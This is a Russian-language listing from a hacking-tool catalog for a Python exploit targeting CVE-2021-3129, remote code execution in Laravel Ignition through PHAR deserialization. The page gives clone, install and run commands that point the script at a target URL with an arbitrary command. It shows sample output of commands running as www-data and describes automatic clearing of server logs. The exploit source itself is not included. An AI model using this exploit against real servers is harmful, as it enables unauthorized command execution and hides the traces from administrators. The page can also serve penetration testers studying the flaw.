Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-3129 — # CVE-2021-3129 (эксплойт RCE для Laravel Ignition) | Kitploit
Инструменты/GitHubGitHub/0x0d3ad/cve-2021-3129
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHub0x0d3ad/cve-2021-3129

CVE-2021-3129

# CVE-2021-3129 (эксплойт RCE для Laravel Ignition)

Репозиторий
1011 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-3129 Laravel Ignition RCE Exploit

Это скрипт эксплойта на Python для CVE-2021-3129 — уязвимости удалённого выполнения кода в Laravel при установленном пакете Ignition. Данная уязвимость позволяет злоумышленнику выполнять произвольные системные команды через десериализацию PHAR.

Возможности

  • Автоматически генерирует PHAR-полезную нагрузку с помощью phpggc
  • Принимает пользовательский ввод для любой команды (например, id, whoami и т.д.)
  • Автоматизирует весь процесс эксплуатации, включая очистку логов, внедрение полезной нагрузки, преобразование логов в PHAR и запуск десериализации

Предварительные требования

  • Python 3.x
  • Библиотека requests
  • Установленный PHP в вашей системе
  • Установленный phpggc (для генерации PHAR-полезных нагрузок)

Установка

  1. Клонируйте репозиторий:

    root@kitploit:~
    git clone https://github.com/0x0d3ad/CVE-2021-3129.git
    cd CVE-2021-3129
    
  2. Установите необходимые Python-пакеты:

    root@kitploit:~
    pip install requests
    
  3. Запустите скрипт с указанием цели и команды:

    root@kitploit:~
    python3 CVE-2021-3129.py http://example.com --cmd 'id'
    

    Пример вывода:

    root@kitploit:~
    [+] Generating PHAR payload for command: id
    [+] Trying to clear logs
    [+] Logs cleared
    [+] Convert log file to PHAR
    [+] Successfully converted logs to PHAR
    [+] PHAR deserialized
    ---------------------------------------
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    ---------------------------------------
    [+] Trying to clear logs
    [+] Logs cleared
    

Аргументы

  • target (обязательный): URL уязвимого Laravel-приложения.
  • --cmd (необязательный): Команда, которая будет выполнена на цели (по умолчанию: whoami).
  • --log_path (необязательный): Путь к файлу лога (по умолчанию: ../storage/logs/laravel.log).

POC

POC

POC

Скачать инструмент